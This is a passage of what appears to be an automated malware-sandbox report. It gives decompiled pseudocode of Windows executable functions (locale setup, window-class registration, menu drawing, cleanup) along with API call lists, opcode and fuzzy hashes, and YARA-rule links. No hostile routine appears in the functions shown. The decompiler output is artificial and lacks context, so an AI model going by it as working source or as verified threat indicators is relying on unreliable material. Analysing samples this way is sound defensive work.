				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409E11);
				return E00404344( &_v24, 4);
			}























                                                                                0x00409c40
                                                                                0x00409c45
                                                                                0x00409c46
                                                                                0x00409c47
                                                                                0x00409c48
                                                                                0x00409c49
                                                                                0x00409c4d
                                                                                0x00409c4f
                                                                                0x00409c53
                                                                                0x00409c54
                                                                                0x00409c59
                                                                                0x00409c5c
                                                                                0x00409c5f
                                                                                0x00409c66
                                                                                0x00409c7e
                                                                                0x00409c96
                                                                                0x00409de0
                                                                                0x00409de2
                                                                                0x00409de7
                                                                                0x00409de9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409cff
                                                                                0x00409d04
                                                                                0x00409d0b
                                                                                0x00409d49
                                                                                0x00409d4e
                                                                                0x00409d50
                                                                                0x00409d6f
                                                                                0x00409d74
                                                                                0x00409d76
                                                                                0x00409d97
                                                                                0x00409d9c
                                                                                0x00409d9e
                                                                                0x00409db3
                                                                                0x00409db3
                                                                                0x00409db5
                                                                                0x00409dbb
                                                                                0x00409dc2
                                                                                0x00409db7
                                                                                0x00409db7
                                                                                0x00409db9
                                                                                0x00409dd0
                                                                                0x00409dda
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409db9
                                                                                0x00409da0
                                                                                0x00409da7
                                                                                0x00409dac
                                                                                0x00409dac
                                                                                0x00409d78
                                                                                0x00409d7f
                                                                                0x00409d84
                                                                                0x00409d84
                                                                                0x00409d52
                                                                                0x00409d59
                                                                                0x00409d5e
                                                                                0x00409d5e
                                                                                0x00409ddf
                                                                                0x00409ddf
                                                                                0x00409d0d
                                                                                0x00409d16
                                                                                0x00409d24
                                                                                0x00409d2e
                                                                                0x00409d33
                                                                                0x00409d33
                                                                                0x00409d0b
                                                                                0x00409c9c
                                                                                0x00409c9c
                                                                                0x00409ca1
                                                                                0x00409ca4
                                                                                0x00409cb2
                                                                                0x00409cae
                                                                                0x00409cae
                                                                                0x00409cae
                                                                                0x00409cb6
                                                                                0x00409cf1
                                                                                0x00409cb8
                                                                                0x00409cdd
                                                                                0x00409cbe
                                                                                0x00409cbe
                                                                                0x00409cc0
                                                                                0x00409cc2
                                                                                0x00409cc4
                                                                                0x00409ccd
                                                                                0x00409cd7
                                                                                0x00409cd7
                                                                                0x00409cc4
                                                                                0x00409cdc
                                                                                0x00409cdc
                                                                                0x00409cdc
                                                                                0x00409ce8
                                                                                0x00409cb6
                                                                                0x00409def
                                                                                0x00409df1
                                                                                0x00409df4
                                                                                0x00409df7
                                                                                0x00409e09

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409E0A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409C6F
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: eeee$ggg$yyyy
                                                                                • API String ID: 4232894706-1253427255
                                                                                • Opcode ID: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction ID: 1a36ec5943870a74506374bfa0bb250890d6a6f3bc275ed72c2f61215dc1fb70
                                                                                • Opcode Fuzzy Hash: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction Fuzzy Hash: C441E4B47081055BD715EB6AC8816BFB2A6DF84304B64453BE692B33C7EB3C9D02926D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00438E24, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00438E24(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x438faf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E004324CC != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E004324CC;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B264(_t83, _t84, _t98, _t100);
						}
					}
					 *0x46b8d0 = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B264(_t83, _t85, _t98, _t100);
					}
					E00408D84( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043C024(_t100);
					E00436848(_t100, E0041EB60( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037B0(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x438fb6);
					return E00404320( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x486ca0; // 0x41cc64
						E00406520(_t75,  &_v196);
						_t84 = _v196;
						E0040A0EC(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403D80();
					} else {
						_t97 =  *0x4317f8; // 0x431844
						if(E00403740(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043BD14(_t83);
					}
					goto L7;
				}
			}




















                                                                                0x00438e24
                                                                                0x00438e24
                                                                                0x00438e2d
                                                                                0x00438e31
                                                                                0x00438e37
                                                                                0x00438e3b
                                                                                0x00438e3c
                                                                                0x00438e41
                                                                                0x00438e44
                                                                                0x00438e4f
                                                                                0x00438e51
                                                                                0x00438e5b
                                                                                0x00438ed0
                                                                                0x00438ed3
                                                                                0x00438ee8
                                                                                0x00438ef0
                                                                                0x00438ef2
                                                                                0x00438ef5
                                                                                0x00438f06
                                                                                0x00438f10
                                                                                0x00438f10
                                                                                0x00438f15
                                                                                0x00438f1f
                                                                                0x00438f2e
                                                                                0x00438f30
                                                                                0x00438f30
                                                                                0x00438f2e
                                                                                0x00438f35
                                                                                0x00438f43
                                                                                0x00438f45
                                                                                0x00438f52
                                                                                0x00438f54
                                                                                0x00438f54
                                                                                0x00438f5c
                                                                                0x00438f63
                                                                                0x00438f68
                                                                                0x00438f80
                                                                                0x00438f85
                                                                                0x00438f89
                                                                                0x00438f91
                                                                                0x00438f91
                                                                                0x00438f98
                                                                                0x00438f9b
                                                                                0x00438f9e
                                                                                0x00438fae
                                                                                0x00438e66
                                                                                0x00438e66
                                                                                0x00438e6b
                                                                                0x00438e90
                                                                                0x00438e93
                                                                                0x00438e99
                                                                                0x00438eaf
                                                                                0x00438eb4
                                                                                0x00438eb9
                                                                                0x00438ec6
                                                                                0x00438ecb
                                                                                0x00438e73
                                                                                0x00438e75
                                                                                0x00438e82
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00438e8b
                                                                                0x00438e8b
                                                                                0x00000000
                                                                                0x00438e6b

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction ID: 9ca51f5f29ae1eb14152c1338e28f16d362e04c9e494997458acfa82f7e2cf98
                                                                                • Opcode Fuzzy Hash: 21dd18e9953e48b37a4c7903d912f91da23f7b871cb6d6bdeab43af77ca17acd
                                                                                • Instruction Fuzzy Hash: 81416D70A003088BDB21EB65C841B9AB7FAAF48304F0445AEE549E7391DB78AD44CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004099B8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E004099B8(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x409acb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x487758;
				_t83 = 0x487788;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E0040997C(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E00404374(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E0040997C(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E00404374(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x4877b8;
				_t84 = 0x4877d4;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E0040997C(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E00404374(_t87, _v24);
					E0040997C(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E00404374(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409AD2);
				return E00404344( &_v28, 4);
			}

















                                                                                0x004099b9
                                                                                0x004099bd
                                                                                0x004099be
                                                                                0x004099bf
                                                                                0x004099c0
                                                                                0x004099c1
                                                                                0x004099c2
                                                                                0x004099c8
                                                                                0x004099c9
                                                                                0x004099ce
                                                                                0x004099d1
                                                                                0x004099d9
                                                                                0x004099dc
                                                                                0x004099e1
                                                                                0x004099e6
                                                                                0x004099eb
                                                                                0x004099fa
                                                                                0x004099fe
                                                                                0x00409a09
                                                                                0x00409a1d
                                                                                0x00409a21
                                                                                0x00409a2c
                                                                                0x00409a31
                                                                                0x00409a32
                                                                                0x00409a35
                                                                                0x00409a38
                                                                                0x00409a3d
                                                                                0x00409a42
                                                                                0x00409a47
                                                                                0x00409a4c
                                                                                0x00409a4c
                                                                                0x00409a54
                                                                                0x00409a57
                                                                                0x00409a6f
                                                                                0x00409a7a
                                                                                0x00409a94
                                                                                0x00409a9f
                                                                                0x00409aa4
                                                                                0x00409aa5
                                                                                0x00409aa8
                                                                                0x00409aab
                                                                                0x00409ab2
                                                                                0x00409ab5
                                                                                0x00409ab8
                                                                                0x00409aca

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00409ACB,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: Dv@$|v@$u@
                                                                                • API String ID: 635194068-2345670339
                                                                                • Opcode ID: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction ID: 09a08a330bd4a45439277aa33b1eaf094ed5bc7a83b6c8959b739365ddb57b32
                                                                                • Opcode Fuzzy Hash: 354055b3c218b326d5e2525807c87160312728312255f27513c187d7af9ec646
                                                                                • Instruction Fuzzy Hash: B431B6B1B001086BDB00DA55C891EAF77A9D789314F61843BEA09E7381D73DED4187A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00455CC0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00455CC0(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x455dce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t4 =  &_v8; // 0x455438
				_t55 = E00455C3C( *_t4);
				_t5 =  &_v8; // 0x455438
				if( *((char*)( *_t5 + 0x88)) != 0) {
					_t7 =  &_v8; // 0x455438
					_t51 =  *_t7;
					_t79 =  *((intOrPtr*)(_t51 + 0x48));
					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
						_t9 =  &_v8; // 0x455438
						E00456214( *_t9);
					}
				}
				E00453DC8(_t55,  &_v20);
				E00432818(_v20, 0,  &_v16, _t79);
				_t36 =  *0x487bfc; // 0x22e1310
				E00455E7C(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x455d77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t15 =  &_v8; // 0x455438
				if( *((short*)( *_t15 + 0xea)) != 0) {
					_t18 =  &_v8; // 0x455438
					 *((intOrPtr*)( *_t18 + 0xe8))();
				}
				if(_v9 != 0) {
					E00455BD8();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x486dcc; // 0x487030
				if(_t41 ==  *_t67 && E0041B790() != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00455DD5);
				return E00404344( &_v20, 2);
			}

















                                                                                0x00455cc1
                                                                                0x00455cc3
                                                                                0x00455ccb
                                                                                0x00455cce
                                                                                0x00455cd1
                                                                                0x00455cd6
                                                                                0x00455cd7
                                                                                0x00455cdc
                                                                                0x00455cdf
                                                                                0x00455ce2
                                                                                0x00455cea
                                                                                0x00455cec
                                                                                0x00455cf6
                                                                                0x00455cf8
                                                                                0x00455cf8
                                                                                0x00455cfb
                                                                                0x00455cff
                                                                                0x00455d01
                                                                                0x00455d04
                                                                                0x00455d04
                                                                                0x00455cff
                                                                                0x00455d0e
                                                                                0x00455d19
                                                                                0x00455d21
                                                                                0x00455d26
                                                                                0x00455d2b
                                                                                0x00455d31
                                                                                0x00455d32
                                                                                0x00455d37
                                                                                0x00455d3a
                                                                                0x00455d3d
                                                                                0x00455d48
                                                                                0x00455d4d
                                                                                0x00455d59
                                                                                0x00455d59
                                                                                0x00455d63
                                                                                0x00455d68
                                                                                0x00455d68
                                                                                0x00455d6f
                                                                                0x00455d72
                                                                                0x00455d8c
                                                                                0x00455d91
                                                                                0x00455d99
                                                                                0x00455da4
                                                                                0x00455da4
                                                                                0x00455dac
                                                                                0x00455dae
                                                                                0x00455dae
                                                                                0x00455db5
                                                                                0x00455db8
                                                                                0x00455dbb
                                                                                0x00455dcd

                                                                                APIs
                                                                                  • Part of subcall function 00455C3C: GetCursorPos.USER32 ref: 00455C45
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00455D8C
                                                                                • WaitMessage.USER32(00000000,00455DCE,?,?,?,0046AE10), ref: 00455DAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentCursorMessageThreadWait
                                                                                • String ID: 0pH$8TE
                                                                                • API String ID: 535285469-2347222379
                                                                                • Opcode ID: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction ID: ef179845760a388f2d3b94f2e4396c7f7e61d99bb3ed3a3471b4b2a0e5122e17
                                                                                • Opcode Fuzzy Hash: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction Fuzzy Hash: FE31A430A04648EFDB01DB95D855BAEB7F5EB45305F6184BAEC00A7392D7786E0CCB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00448B18, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00448B18(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x486dd0; // 0x4877f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00448E9C(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) + ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                                                0x00448b1a
                                                                                0x00448b1d
                                                                                0x00448b1f
                                                                                0x00448b28
                                                                                0x00448b3f
                                                                                0x00448b41
                                                                                0x00448b48
                                                                                0x00448b54
                                                                                0x00448b58
                                                                                0x00448b66
                                                                                0x00448b6d
                                                                                0x00448b71
                                                                                0x00448b83
                                                                                0x00448b88
                                                                                0x00448ba6
                                                                                0x00448baa
                                                                                0x00448bb8
                                                                                0x00448bbf
                                                                                0x00000000
                                                                                0x00448bc5
                                                                                0x00448bbf
                                                                                0x00448b88
                                                                                0x00448b6d
                                                                                0x00448bd2

                                                                                APIs
                                                                                • GetMenuItemInfoA.USER32 ref: 00448B66
                                                                                • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448BB8
                                                                                • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448BC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: P
                                                                                • API String ID: 3227129158-3110715001
                                                                                • Opcode ID: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction ID: 8907f95ecabcbea213e89b25aadd05f800e1c1858eab99648a633ad0099d5281
                                                                                • Opcode Fuzzy Hash: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction Fuzzy Hash: EA118FB0605210AFE3109B29CC81B5E76D5EB84358F148A2EF0A4DB3D5DBB9D885C78A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00425BB8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E00425BB8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x425c81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x487a2c =  *0x487a2c + 1;
				if( *0x487a2c == 0) {
					_t3 =  *0x487a84; // 0x22e0b50
					E004035B4(_t3);
					_t5 =  *0x46b784; // 0x0
					E004035B4(_t5);
					_t7 =  *0x46b780; // 0x0
					E004035B4(_t7);
					E00422B9C(__ebx, _t27);
					_t10 =  *0x46b788; // 0x22e0b74
					E004035B4(_t10);
					_t12 =  *0x487a80; // 0x22e0bb0
					E004035B4(_t12);
					_t14 =  *0x487a74; // 0x22e0ad8
					E004035B4(_t14);
					_t16 =  *0x487a78; // 0x22e0b00
					E004035B4(_t16);
					_t18 =  *0x487a7c; // 0x22e0b28
					E004035B4(_t18);
					_t20 =  *0x487a28; // 0xf50806b6
					DeleteObject(_t20);
					_push(0x487a44);
					L00406838();
					_push(0x487a5c);
					L00406838();
					_t34 =  *0x412938; // 0x41293c
					E00404E00(0x46b6a0, 0x12, _t34);
					_t35 =  *0x412938; // 0x41293c
					E00404E00(0x46b518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x425c88);
				return 0;
			}

















                                                                                0x00425bb8
                                                                                0x00425bbd
                                                                                0x00425bbe
                                                                                0x00425bc3
                                                                                0x00425bc6
                                                                                0x00425bc9
                                                                                0x00425bcf
                                                                                0x00425bd5
                                                                                0x00425bda
                                                                                0x00425bdf
                                                                                0x00425be4
                                                                                0x00425be9
                                                                                0x00425bee
                                                                                0x00425bf3
                                                                                0x00425bf8
                                                                                0x00425bfd
                                                                                0x00425c02
                                                                                0x00425c07
                                                                                0x00425c0c
                                                                                0x00425c11
                                                                                0x00425c16
                                                                                0x00425c1b
                                                                                0x00425c20
                                                                                0x00425c25
                                                                                0x00425c2a
                                                                                0x00425c30
                                                                                0x00425c35
                                                                                0x00425c3a
                                                                                0x00425c3f
                                                                                0x00425c44
                                                                                0x00425c53
                                                                                0x00425c59
                                                                                0x00425c68
                                                                                0x00425c6e
                                                                                0x00425c6e
                                                                                0x00425c75
                                                                                0x00425c78
                                                                                0x00425c7b
                                                                                0x00425c80

                                                                                APIs
                                                                                • DeleteObject.GDI32(F50806B6), ref: 00425C30
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A44,F50806B6,00000000,00425C81), ref: 00425C3A
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A5C,00487A44,F50806B6,00000000,00425C81), ref: 00425C44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Delete$CriticalSection$Object
                                                                                • String ID: <)A
                                                                                • API String ID: 378701848-2544708363
                                                                                • Opcode ID: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction ID: 22795a93df35987cad2729373931b2b91126da6fc89bb47129e9437559cd03b6
                                                                                • Opcode Fuzzy Hash: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction Fuzzy Hash: 08013CB03141009BC715FF26ED5290D7768E744705360487BF000A7BB2DA7CDE518B8D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B34C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040B34C() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x46b0e4 = _t1;
				}
				if( *0x46b0e4 == 0) {
					 *0x46b0e4 = E00408ACC;
					return E00408ACC;
				}
				return _t1;
			}





                                                                                0x0040b352
                                                                                0x0040b357
                                                                                0x0040b35b
                                                                                0x0040b363
                                                                                0x0040b368
                                                                                0x0040b368
                                                                                0x0040b374
                                                                                0x0040b37b
                                                                                0x00000000
                                                                                0x0040b37b
                                                                                0x0040b381

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C025,00000000,0040C038), ref: 0040B352
                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
